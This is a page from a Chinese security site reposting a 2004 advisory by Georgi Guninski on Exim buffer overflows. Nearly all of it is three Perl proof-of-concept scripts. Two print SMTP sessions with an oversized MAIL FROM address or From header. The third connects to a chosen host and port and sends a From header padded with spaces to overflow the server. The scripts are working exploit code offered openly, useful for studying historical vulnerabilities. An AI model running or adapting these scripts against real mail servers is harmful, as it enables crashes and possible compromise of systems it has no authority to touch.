首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Exim Buffer Overflows
来源:vfocus.net 作者:georgi 发布时间:2004-05-08  

Exim Buffer Overflows (sender_verify, headers_check_syntax)

----exi1.pl----------------------------------
#!/usr/bin/perl
# works if sender_verify = true is in exim.conf
# written by georgi guninski
# cannot be used in vulnerability databases or CVE
print "HELO a\r\n";
my $ch=getc();
print "MAIL FROM: " . "v" x 300 ."\@vt" . "\r\n";
print "RCPT TO: BillGay\@localhost\r\n";
print "DATA\r\n";
#print "From" . " " x 65 . ":" . "ff fff ff" ."\r\n";
print "asdasd\r\n";
print "\r\n";
print ".\r\n";
print "QUIT\r\n";
---------------------------------------------

----exi2.pl----------------------------------
#!/usr/bin/perl
# works if headers_check_syntax is in exim.conf
# written by georgi guninski
# cannot be used in vulnerability databases

print "HELO a\r\nMAIL FROM: BillGay\@localhost\r\nRCPT TO: SteveNoBall\@localhost\r\n";
print "DATA\r\n";
my $ch=getc();
print "From" . " " x 275 . ":" ."vv v \r\n";
print "asdasd\r\n";
print "\r\n";
print ".\r\n";
print "QUIT\r\n";
---------------------------------------------


----exi3.pl----------------------------------
#!/usr/bin/perl

use IO::Socket;

my $port = $ARGV[1];
my $host = $ARGV[0];

# written by georgi guninski
# cannot be used in vulnerability databases
print "Written by georgi guninski\nCannot be used in vulnerability databases or CVE\n";

my $repl;
my $socket = IO::Socket::INET->new(PeerAddr => $host,PeerPort => $port,Proto => "TCP") || die "socket";

$repl= <$socket>;
print "server replied ${repl}";
my $req = "HELO a\r\n";

syswrite($socket,$req,length($req));
$repl= <$socket>;
print "server replied ${repl}";


my $fromaddr="BillGay\@soft";
my $touser="SteveNoBall\@soft";

$req = "MAIL FROM: ${fromaddr}\r\n";

syswrite($socket,$req,length($req));
$repl= <$socket>;
print "server replied ${repl}";

$req = "RCPT TO: ${touser}\r\n";
syswrite($socket,$req,length($req));
$repl= <$socket>;
print "server replied ${repl}";
$req = "DATA\r\n";

syswrite($socket,$req,length($req));
$repl= <$socket>;
print "server replied ${repl}";

print "Attached with debugger to exim and press enter\n";
my $ccc=getc();

$req = "From" . " " x 200 . ":" ." root\r\n";

$req .= "just to let you know that you sux\r\n";
$req .= ".\r\n";

syswrite($socket,$req,length($req));
$repl= <$socket>;
print "server replied ${repl}";

while(<$socket>)
{
print $_;
}


close $socket;


---------------------------------------------
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·4nalbum module version 0.92 Re
·sendmail 8.12.9 local root exp
·Titan FTP Server Aborted LIST
·MyWeb 3.3 Buffer Overflow Expl
·autoRST - Automated TCP RST Ex
·Eudora file URL buffer overflo
·Squirrelmail Local Root Chpass
·Pound <=1.5 remote format s
·X-Chat socks-5 remote buffer o
·Monit 4.1 Remote Buffer Overru
·LHa Local Stack Overflow Proof
·Sasser Worm ftpd Remote Buffer
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved